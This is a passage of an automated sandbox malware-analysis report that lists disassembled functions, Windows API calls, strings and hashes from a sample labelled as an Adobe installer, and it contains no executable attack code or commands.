                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                                                          • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                                          • API String ID: 883996979-221126205
                                                                                                                                                          • Opcode ID: bae8e6094ea23e3d6cb718dce3c682f878d0197b9e1d8439d12bf4a56de9586d
                                                                                                                                                          • Instruction ID: 875c3796c046624c2228b02c90a975a84e6b5ea672051c8ab2535e6639634d95
                                                                                                                                                          • Opcode Fuzzy Hash: bae8e6094ea23e3d6cb718dce3c682f878d0197b9e1d8439d12bf4a56de9586d
                                                                                                                                                          • Instruction Fuzzy Hash: EC316570A04608AEDB11EFEAC841ADEB7B8EF05314F9084BBF518E7392D77C59058B59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSendShowWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1631623395-0
                                                                                                                                                          • Opcode ID: 424a1ab9b82cb33402a0ef7c7baa594af4bf5d75f22f9edbf91f90ee8efcbe0f
                                                                                                                                                          • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                                                                                                          • Opcode Fuzzy Hash: 424a1ab9b82cb33402a0ef7c7baa594af4bf5d75f22f9edbf91f90ee8efcbe0f
                                                                                                                                                          • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004183A3
                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                                                                          • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                          • String ID: ,
                                                                                                                                                          • API String ID: 2266315723-3772416878
                                                                                                                                                          • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                                                                          • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                                                                          • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                                                                          • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00454B10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25
                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B3E
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B65
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B6A
                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B7B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                          • Opcode ID: 2cfeda02b6a1e99207587e1f6d93d0b2a9553dc635e40ceb655a503d92ac80ca
                                                                                                                                                          • Instruction ID: 71a91aff67a88180f283013a3394e07777ed446edd0ea8bbca610d6ac1ec1ab7
                                                                                                                                                          • Opcode Fuzzy Hash: 2cfeda02b6a1e99207587e1f6d93d0b2a9553dc635e40ceb655a503d92ac80ca
                                                                                                                                                          • Instruction Fuzzy Hash: 76F06270684302B5E610EA758C07F2B219C9B80B5DF50092ABE45EE1C3D7BCE44C4A2A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045C9A8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C9B1
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C9C1
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C9D1
                                                                                                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047E1AB,00000000,0047E1D4), ref: 0045C9F6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$CryptVersion
                                                                                                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                          • API String ID: 1951258720-508647305
                                                                                                                                                          • Opcode ID: 29080689e44d0f35022647b33967859d98a6fde3a256b76c87c92fdbaa8d7a9c
                                                                                                                                                          • Instruction ID: f30e091031291b2f12efd1c24b35210b9374578792016564e11b1fa4c6f216ed
                                                                                                                                                          • Opcode Fuzzy Hash: 29080689e44d0f35022647b33967859d98a6fde3a256b76c87c92fdbaa8d7a9c
                                                                                                                                                          • Instruction Fuzzy Hash: C3F049B0A01700CEDB14DF76BEC633B3A95D7A8312F18803BA519A51A2E738084CCA5C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0049676C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88,?,?,00000000,0049A628), ref: 004967C3
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496846
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000), ref: 0049685E
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00496889,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88), ref: 0049687C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                          • String ID: isRS-$isRS-???.tmp
                                                                                                                                                          • API String ID: 134685335-3422211394
                                                                                                                                                          • Opcode ID: 1cf8e9bc9b3c20357937420cd326a99100db9ac98f37d329e20eb371d892ce32
                                                                                                                                                          • Instruction ID: 4c3790275d38ca103fc9de384e2170f2b3829de03e7269e11a2e0ee89d27f860
                                                                                                                                                          • Opcode Fuzzy Hash: 1cf8e9bc9b3c20357937420cd326a99100db9ac98f37d329e20eb371d892ce32
                                                                                                                                                          • Instruction Fuzzy Hash: C331A671901618AFDF10FF65CC41ACEBBBCDB45304F5184FBA808A32A1E6389F458E58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044C030 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                          • API String ID: 2238633743-1050967733
                                                                                                                                                          • Opcode ID: 0de9e05f27749137ffab1fe308f9190fc83f01827653125ce4f3cced318db0ec
                                                                                                                                                          • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                                                                                          • Opcode Fuzzy Hash: 0de9e05f27749137ffab1fe308f9190fc83f01827653125ce4f3cced318db0ec
                                                                                                                                                          • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0045688C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456909
                                                                                                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456930
                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00456941
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456C19,?,00000000,00456C55), ref: 00456C04
                                                                                                                                                          Strings
                                                                                                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456A84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                          • API String ID: 2236967946-3182603685
                                                                                                                                                          • Opcode ID: 2ad0bef8c84949f14e5e2d5e65e103814edb4cbdf20235d422bc76e1971a723a
                                                                                                                                                          • Instruction ID: 10654f18c5d002830b012396f94dace0bb6b4eb939fefcd194574106bfd79093
                                                                                                                                                          • Opcode Fuzzy Hash: 2ad0bef8c84949f14e5e2d5e65e103814edb4cbdf20235d422bc76e1971a723a
                                                                                                                                                          • Instruction Fuzzy Hash: 6791FE74204204EFD716CF55C961F5ABBF9FB89305F6280BAEC0497392C639AE14CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00455338 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455477), ref: 00455368
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045536E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                          • API String ID: 1646373207-3712701948
                                                                                                                                                          • Opcode ID: cc7745dbfee59e8a39e4717e3973c749d4d024fdb8d5261c409c68ffe2c4b2d5
                                                                                                                                                          • Instruction ID: dabfbf279b89037e1462e9a882b6d795e79896abcd5759e9fca5673e80196c90
                                                                                                                                                          • Opcode Fuzzy Hash: cc7745dbfee59e8a39e4717e3973c749d4d024fdb8d5261c409c68ffe2c4b2d5
                                                                                                                                                          • Instruction Fuzzy Hash: 69419371A00649AFCF01EFA5C892AEFB7B8EF49305F508566F804F7252D67C5D098B68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Placement$Iconic
                                                                                                                                                          • String ID: ,
                                                                                                                                                          • API String ID: 568898626-3772416878
                                                                                                                                                          • Opcode ID: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
                                                                                                                                                          • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                                                                                                          • Opcode Fuzzy Hash: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
                                                                                                                                                          • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00463504 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000000,004636C1), ref: 00463535
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 004635C4
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463656
                                                                                                                                                          • FindClose.KERNEL32(000000FF,0046367D,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463670
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4011626565-0
                                                                                                                                                          • Opcode ID: dbca08b9d693e00e2d4e1ffad56bca2e22960ad918938c86d8af07611c6483b8
                                                                                                                                                          • Instruction ID: b0d7957544a47795154538d81e468f7c6c920a748ffd929e2f02ef98002ad070
                                                                                                                                                          • Opcode Fuzzy Hash: dbca08b9d693e00e2d4e1ffad56bca2e22960ad918938c86d8af07611c6483b8
                                                                                                                                                          • Instruction Fuzzy Hash: BF418770A00A58AFCB11EF65CC55ADEB7B8EB48709F4044BAF404A7391E77C9F448E59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00463980 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463B67), ref: 004639F5
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463A3B
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463AF0
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00463B1B,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463B0E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4011626565-0
                                                                                                                                                          • Opcode ID: 28f9e3410985afb90aea182210dc45069b30c1a9ca39f4816f6627e3126ba2d6
                                                                                                                                                          • Instruction ID: 97f58be689a7aad7613f851e0c4409f020999d87f0ba5e9b9459bb80848a8bb9
                                                                                                                                                          • Opcode Fuzzy Hash: 28f9e3410985afb90aea182210dc45069b30c1a9ca39f4816f6627e3126ba2d6
                                                                                                                                                          • Instruction Fuzzy Hash: 26417034A00658DBCB10EFA5DC859DEB7B8EB88305F4045AAF804A7341EB789F458E59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E7A8 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E7CA
                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                                                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E802
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E80A
                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E810
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1177325624-0
                                                                                                                                                          • Opcode ID: 07608c2f518a79a4d4257b84a8e9f7bc3bbf9e1cf85a77bbc9dfec21d4af983b
                                                                                                                                                          • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                                                                                                          • Opcode Fuzzy Hash: 07608c2f518a79a4d4257b84a8e9f7bc3bbf9e1cf85a77bbc9dfec21d4af983b
